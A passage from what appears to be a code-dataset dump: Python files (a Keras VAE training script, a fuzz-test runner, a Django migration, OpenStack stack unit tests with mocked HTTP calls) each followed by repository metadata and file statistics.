    # --------------------------------------------------------------------------------------------------------------------
    encoder = Model(rnaseq_input, z_mean_encoded)
    encoded_rnaseq_df = encoder.predict_on_batch(rnaseq)
    encoded_rnaseq_df = pd.DataFrame(encoded_rnaseq_df, index=rnaseq.index)
    encoded_rnaseq_df.columns.name = 'sample_id'
    # Latent features are 1-based in the output files
    encoded_rnaseq_df.columns = encoded_rnaseq_df.columns + 1

    # --------------------------------------------------------------------------------------------------------------------
    # Visualize training performance
    # --------------------------------------------------------------------------------------------------------------------
    history_df = pd.DataFrame(hist.history)
    ax = history_df.plot()
    ax.set_xlabel('Epochs')
    ax.set_ylabel('VAE Loss')
    fig = ax.get_figure()
    fig.savefig(hist_plot_file)
    del ax, fig

    # --------------------------------------------------------------------------------------------------------------------
    # Output
    # --------------------------------------------------------------------------------------------------------------------
    # Save training performance along with the hyperparameters used
    history_df = pd.DataFrame(hist.history)
    history_df = history_df.assign(learning_rate=learning_rate)
    history_df = history_df.assign(batch_size=batch_size)
    history_df = history_df.assign(epochs=epochs)
    history_df = history_df.assign(kappa=kappa)
    history_df.to_csv(stat_file, sep='\t', index=False)

    # Save latent space representation
    encoded_rnaseq_df.to_csv(encoded_file, sep='\t')

    # Save models
    # (source) https://machinelearningmastery.com/save-load-keras-deep-learning-models/
    # Save encoder model
    encoder.save(model_encoder_file)
    # serialize weights to HDF5
    encoder.save_weights(weights_encoder_file)

    # Save decoder model
    # (source) https://github.com/greenelab/tybalt/blob/master/scripts/nbconverted/tybalt_vae.py
    # can generate from any sampled z vector
    decoder_input = Input(shape=(latent_dim, ))
    _x_decoded_mean = decoder_model(decoder_input)
    decoder = Model(decoder_input, _x_decoded_mean)
    decoder.save(model_decoder_file)
    # serialize weights to HDF5
    decoder.save_weights(weights_decoder_file)

    # Save weight matrix: how each gene contributes to each feature
    # Reuse the decoder built above (the original rebuilt an identical model
    # here, which was redundant): its layers are [InputLayer, Sequential].
    weights = [layer.get_weights() for layer in decoder.layers]

    # Multiply hidden layers together to obtain a single representation of gene weights
    intermediate_weight_df = pd.DataFrame(weights[1][0])
    hidden_weight_df = pd.DataFrame(weights[1][2])
    abstracted_weight_df = intermediate_weight_df.dot(hidden_weight_df)
    abstracted_weight_df.index = range(0, latent_dim)
    abstracted_weight_df.columns = rnaseq.columns

    weight_file = os.path.join(
        base_dir, "data", analysis_name, "VAE_weight_matrix_seed" + str(seed_input) + ".txt")
    abstracted_weight_df.to_csv(weight_file, sep='\t')
| 45.771331
| 156
| 0.604504
| 3,048
| 26,822
| 5.109252
| 0.139108
| 0.020227
| 0.011558
| 0.016182
| 0.947602
| 0.942465
| 0.93797
| 0.935658
| 0.935658
| 0.935658
| 0
| 0.006593
| 0.180039
| 26,822
| 585
| 157
| 45.849573
| 0.701496
| 0.498024
| 0
| 0.822785
| 0
| 0
| 0.073184
| 0.046261
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008439
| false
| 0
| 0.067511
| 0
| 0.075949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2bfe304f7a9b11218f295d33188fa457cc18063
| 195
|
py
|
Python
|
fuzzing/run_fuzzing.py
|
jrs1061/wheatley
|
bd1143413495ef317970b9c6cedbc4903fdbf7a9
|
[
"MIT"
] | 14
|
2020-08-16T21:41:13.000Z
|
2021-07-13T01:15:01.000Z
|
fuzzing/run_fuzzing.py
|
jrs1061/wheatley
|
bd1143413495ef317970b9c6cedbc4903fdbf7a9
|
[
"MIT"
] | 121
|
2020-08-13T16:54:46.000Z
|
2021-09-17T10:32:04.000Z
|
fuzzing/run_fuzzing.py
|
Kneasle/wheatley
|
9141bf8511dce737208731e55bfe138d48845319
|
[
"MIT"
] | 10
|
2020-12-20T03:52:47.000Z
|
2021-11-22T14:46:15.000Z
|
from .call_parsing import fuzz_parse_call
from .peal_speed_parsing import fuzz_parse_peal_speed
def run():
    """Run every fuzzing test in sequence."""
    for fuzz_test in (fuzz_parse_call, fuzz_parse_peal_speed):
        fuzz_test()
| 21.666667
| 53
| 0.764103
| 30
| 195
| 4.533333
| 0.466667
| 0.264706
| 0.25
| 0.323529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158974
| 195
| 8
| 54
| 24.375
| 0.829268
| 0.128205
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d2ca0a90f6de23d48539ecf5eee14f219c2f95a8
| 12,447
|
py
|
Python
|
app/migrations/0007_auto_20171002_1559.py
|
minerva22/mf-dataentry
|
ef95e2b7acf8ede83048f41079c46b07ec93a3cc
|
[
"MIT"
] | null | null | null |
app/migrations/0007_auto_20171002_1559.py
|
minerva22/mf-dataentry
|
ef95e2b7acf8ede83048f41079c46b07ec93a3cc
|
[
"MIT"
] | null | null | null |
app/migrations/0007_auto_20171002_1559.py
|
minerva22/mf-dataentry
|
ef95e2b7acf8ede83048f41079c46b07ec93a3cc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 15:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0006_auto_20171002_1236'),
]
operations = [
migrations.AlterField(
model_name='currency',
name='code_dub',
field=models.CharField(blank=True, max_length=2, null=True, unique=True),
),
migrations.AlterField(
model_name='currency',
name='code_leb',
field=models.CharField(blank=True, max_length=2, null=True, unique=True),
),
migrations.AlterField(
model_name='nationality',
name='code_dub',
field=models.CharField(blank=True, max_length=10, null=True, unique=True),
),
migrations.AlterField(
model_name='nationality',
name='code_leb',
field=models.CharField(blank=True, max_length=10, null=True, unique=True),
),
migrations.AlterField(
model_name='securitybond',
name='asset_allocation',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='bank_reference',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securitybond',
name='category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='deposit_place',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securitybond',
name='designation',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securitybond',
name='fix1',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securitybond',
name='fix2',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securitybond',
name='general_ledger',
field=models.CharField(max_length=4),
),
migrations.AlterField(
model_name='securitybond',
name='isin',
field=models.CharField(max_length=20),
),
migrations.AlterField(
model_name='securitybond',
name='multiplier_for_online_prices',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securitybond',
name='provider_code',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='securitybond',
name='quotation_place',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='ratelist',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='subtype',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='symbol',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securitybond',
name='trading_category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='asset_allocation',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='bank_reference',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityfutures',
name='category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='deposit_place',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityfutures',
name='designation',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityfutures',
name='fix1',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityfutures',
name='fix2',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityfutures',
name='general_ledger',
field=models.CharField(max_length=4),
),
migrations.AlterField(
model_name='securityfutures',
name='isin',
field=models.CharField(max_length=20),
),
migrations.AlterField(
model_name='securityfutures',
name='maturity_date',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='securityfutures',
name='multiplier_for_online_prices',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securityfutures',
name='number_of_units',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securityfutures',
name='provider_code',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='securityfutures',
name='quotation_place',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='ratelist',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='subtype',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='symbol',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityfutures',
name='trading_category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='underlying_code',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='asset_allocation',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='bank_reference',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityoption',
name='category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='deposit_place',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityoption',
name='designation',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityoption',
name='fix1',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityoption',
name='fix2',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityoption',
name='general_ledger',
field=models.CharField(max_length=4),
),
migrations.AlterField(
model_name='securityoption',
name='isin',
field=models.CharField(max_length=20),
),
migrations.AlterField(
model_name='securityoption',
name='multiplier_for_online_prices',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securityoption',
name='provider_code',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='securityoption',
name='quotation_place',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='ratelist',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='strike_place',
field=models.FloatField(),
),
migrations.AlterField(
model_name='securityoption',
name='subtype',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='symbol',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityoption',
name='trading_category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='underlying_code',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='asset_allocation',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='bank_reference',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityshare',
name='category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='deposit_place',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityshare',
name='designation',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityshare',
name='fix1',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityshare',
name='fix2',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityshare',
name='general_ledger',
field=models.CharField(max_length=4),
),
migrations.AlterField(
model_name='securityshare',
name='isin',
field=models.CharField(max_length=20),
),
migrations.AlterField(
model_name='securityshare',
name='multiplier_for_online_prices',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securityshare',
name='provider_code',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='securityshare',
name='quotation_place',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='ratelist',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='subtype',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='symbol',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityshare',
name='trading_category',
field=models.CharField(max_length=10),
),
]
| 32.669291
| 86
| 0.549932
| 1,039
| 12,447
| 6.39846
| 0.087584
| 0.219615
| 0.274519
| 0.318442
| 0.959537
| 0.959537
| 0.913809
| 0.90704
| 0.90704
| 0.887184
| 0
| 0.019364
| 0.340323
| 12,447
| 380
| 87
| 32.755263
| 0.790281
| 0.005463
| 0
| 0.965147
| 1
| 0
| 0.147624
| 0.010908
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005362
| 0
| 0.013405
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
d2d272475b42199756737eaa3e91522a030bb8b5
| 150
|
py
|
Python
|
cloudnetpy/products/__init__.py
|
saveriogzz/cloudnetpy
|
baa3ed5f254425c5a9c787556ec652ea659b38ba
|
[
"MIT"
] | 13
|
2020-02-16T06:52:51.000Z
|
2022-03-10T09:43:19.000Z
|
cloudnetpy/products/__init__.py
|
saveriogzz/cloudnetpy
|
baa3ed5f254425c5a9c787556ec652ea659b38ba
|
[
"MIT"
] | 17
|
2020-01-15T10:47:08.000Z
|
2022-03-28T13:08:23.000Z
|
cloudnetpy/products/__init__.py
|
saveriogzz/cloudnetpy
|
baa3ed5f254425c5a9c787556ec652ea659b38ba
|
[
"MIT"
] | 12
|
2020-03-03T16:45:13.000Z
|
2022-03-23T08:02:43.000Z
|
from .drizzle import generate_drizzle
from .classification import generate_classification
from .iwc import generate_iwc
from .lwc import generate_lwc
| 30
| 51
| 0.866667
| 20
| 150
| 6.3
| 0.35
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 150
| 4
| 52
| 37.5
| 0.940299
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
824dfb5ce8407c2f54b2a39aa7748766c40c83be
| 144
|
py
|
Python
|
genelang/bricks/OP2N.py
|
GabrielAmare/Genelang
|
af5294e900d2f79ff54375f9759c156a4b5a098a
|
[
"MIT"
] | null | null | null |
genelang/bricks/OP2N.py
|
GabrielAmare/Genelang
|
af5294e900d2f79ff54375f9759c156a4b5a098a
|
[
"MIT"
] | null | null | null |
genelang/bricks/OP2N.py
|
GabrielAmare/Genelang
|
af5294e900d2f79ff54375f9759c156a4b5a098a
|
[
"MIT"
] | null | null | null |
from .OP2 import OP2
class OP2N(OP2):
def __str__(self):
return f"{str(self.items[0])}{str(self.symbols[0])}{str(self.items[1])}"
| 20.571429
| 80
| 0.625
| 24
| 144
| 3.583333
| 0.583333
| 0.325581
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058333
| 0.166667
| 144
| 6
| 81
| 24
| 0.658333
| 0
| 0
| 0
| 0
| 0.25
| 0.430556
| 0.430556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
827a465adde88652ee07f88d8e3202f88ae46bb7
| 26,874
|
py
|
Python
|
openstack/tests/unit/cloud/test_stack.py
|
anton-sidelnikov/openstacksdk
|
98f0c67120b65814c3bd1663415e302551a14536
|
[
"Apache-2.0"
] | null | null | null |
openstack/tests/unit/cloud/test_stack.py
|
anton-sidelnikov/openstacksdk
|
98f0c67120b65814c3bd1663415e302551a14536
|
[
"Apache-2.0"
] | null | null | null |
openstack/tests/unit/cloud/test_stack.py
|
anton-sidelnikov/openstacksdk
|
98f0c67120b65814c3bd1663415e302551a14536
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import tempfile
import testtools
import openstack.cloud
from openstack.orchestration.v1 import stack
from openstack.tests import fakes
from openstack.tests.unit import base
class TestStack(base.TestCase):
def setUp(self):
super(TestStack, self).setUp()
self.stack_id = self.getUniqueString('id')
self.stack_name = self.getUniqueString('name')
self.stack_tag = self.getUniqueString('tag')
self.stack = fakes.make_fake_stack(self.stack_id, self.stack_name)
def _compare_stacks(self, exp, real):
self.assertDictEqual(
stack.Stack(**exp).to_dict(computed=False),
real.to_dict(computed=False))
def test_list_stacks(self):
fake_stacks = [
self.stack,
fakes.make_fake_stack(
self.getUniqueString('id'),
self.getUniqueString('name'))
]
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stacks": fake_stacks}),
])
stacks = self.cloud.list_stacks()
[self._compare_stacks(b, a) for a, b in zip(stacks, fake_stacks)]
self.assert_calls()
def test_list_stacks_filters(self):
fake_stacks = [
self.stack,
fakes.make_fake_stack(
self.getUniqueString('id'),
self.getUniqueString('name'))
]
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'orchestration', 'public',
append=['stacks'],
qs_elements=['name=a', 'status=b'],
),
json={"stacks": fake_stacks}),
])
stacks = self.cloud.list_stacks(name='a', status='b')
[self._compare_stacks(b, a) for a, b in zip(stacks, fake_stacks)]
self.assert_calls()
def test_list_stacks_exception(self):
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
status_code=404)
])
with testtools.ExpectedException(
openstack.cloud.OpenStackCloudURINotFound):
self.cloud.list_stacks()
self.assert_calls()
def test_search_stacks(self):
fake_stacks = [
self.stack,
fakes.make_fake_stack(
self.getUniqueString('id'),
self.getUniqueString('name'))
]
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stacks": fake_stacks}),
])
stacks = self.cloud.search_stacks()
[self._compare_stacks(b, a) for a, b in zip(stacks, fake_stacks)]
self.assert_calls()
def test_search_stacks_filters(self):
fake_stacks = [
self.stack,
fakes.make_fake_stack(
self.getUniqueString('id'),
self.getUniqueString('name'),
status='CREATE_FAILED')
]
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stacks": fake_stacks}),
])
filters = {'status': 'FAILED'}
stacks = self.cloud.search_stacks(filters=filters)
[self._compare_stacks(b, a) for a, b in zip(stacks, fake_stacks)]
self.assert_calls()
def test_search_stacks_exception(self):
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
status_code=404)
])
with testtools.ExpectedException(
openstack.cloud.OpenStackCloudURINotFound):
self.cloud.search_stacks()
def test_delete_stack(self):
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{name}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name, resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id)),
])
self.assertTrue(self.cloud.delete_stack(self.stack_name))
self.assert_calls()
def test_delete_stack_not_found(self):
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/stack_name?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT, resolve=resolve),
status_code=404),
])
self.assertFalse(self.cloud.delete_stack('stack_name'))
self.assert_calls()
def test_delete_stack_exception(self):
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id),
status_code=400,
reason="ouch"),
])
with testtools.ExpectedException(
openstack.cloud.OpenStackCloudBadRequest):
self.cloud.delete_stack(self.stack_id)
self.assert_calls()
def test_delete_stack_by_name_wait(self):
marker_event = fakes.make_fake_stack_event(
self.stack_id, self.stack_name, status='CREATE_COMPLETE',
resource_name='name')
marker_qs = 'marker={e_id}&sort_dir=asc'.format(
e_id=marker_event['id'])
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{name}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='GET',
uri='{endpoint}/stacks/{name}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
qs='limit=1&sort_dir=desc'),
complete_qs=True,
json={"events": [marker_event]}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id)),
dict(method='GET',
uri='{endpoint}/stacks/{name}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
qs=marker_qs),
complete_qs=True,
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='DELETE_COMPLETE', resource_name='name'),
]}),
dict(method='GET',
uri='{endpoint}/stacks/{name}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name, resolve=resolve),
status_code=404),
])
self.assertTrue(self.cloud.delete_stack(self.stack_name, wait=True))
self.assert_calls()
def test_delete_stack_by_id_wait(self):
marker_event = fakes.make_fake_stack_event(
self.stack_id, self.stack_name, status='CREATE_COMPLETE',
resource_name='name')
marker_qs = 'marker={e_id}&sort_dir=asc'.format(
e_id=marker_event['id'])
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='GET',
uri='{endpoint}/stacks/{id}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
qs='limit=1&sort_dir=desc'),
complete_qs=True,
json={"events": [marker_event]}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id)),
dict(method='GET',
uri='{endpoint}/stacks/{id}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
qs=marker_qs),
complete_qs=True,
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='DELETE_COMPLETE'),
]}),
dict(method='GET',
uri='{endpoint}/stacks/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, resolve=resolve),
status_code=404),
])
self.assertTrue(self.cloud.delete_stack(self.stack_id, wait=True))
self.assert_calls()
def test_delete_stack_wait_failed(self):
failed_stack = self.stack.copy()
failed_stack['stack_status'] = 'DELETE_FAILED'
marker_event = fakes.make_fake_stack_event(
self.stack_id, self.stack_name, status='CREATE_COMPLETE')
marker_qs = 'marker={e_id}&sort_dir=asc'.format(
e_id=marker_event['id'])
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='GET',
uri='{endpoint}/stacks/{id}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
qs='limit=1&sort_dir=desc'),
complete_qs=True,
json={"events": [marker_event]}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id)),
dict(method='GET',
uri='{endpoint}/stacks/{id}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
qs=marker_qs),
complete_qs=True,
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='DELETE_COMPLETE'),
]}),
dict(method='GET',
uri='{endpoint}/stacks/{id}?resolve_outputs=False'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": failed_stack}),
])
with testtools.ExpectedException(
openstack.cloud.OpenStackCloudException):
self.cloud.delete_stack(self.stack_id, wait=True)
self.assert_calls()
def test_create_stack(self):
test_template = tempfile.NamedTemporaryFile(delete=False)
test_template.write(fakes.FAKE_TEMPLATE.encode('utf-8'))
test_template.close()
self.register_uris([
dict(
method='POST', uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stack": self.stack},
validate=dict(
json={
'disable_rollback': False,
'parameters': {},
'stack_name': self.stack_name,
'tags': self.stack_tag,
'template': fakes.FAKE_TEMPLATE_CONTENT,
'timeout_mins': 60}
)),
dict(
method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
self.cloud.create_stack(
self.stack_name,
tags=self.stack_tag,
template_file=test_template.name
)
self.assert_calls()
def test_create_stack_wait(self):
test_template = tempfile.NamedTemporaryFile(delete=False)
test_template.write(fakes.FAKE_TEMPLATE.encode('utf-8'))
test_template.close()
self.register_uris([
dict(
method='POST', uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stack": self.stack},
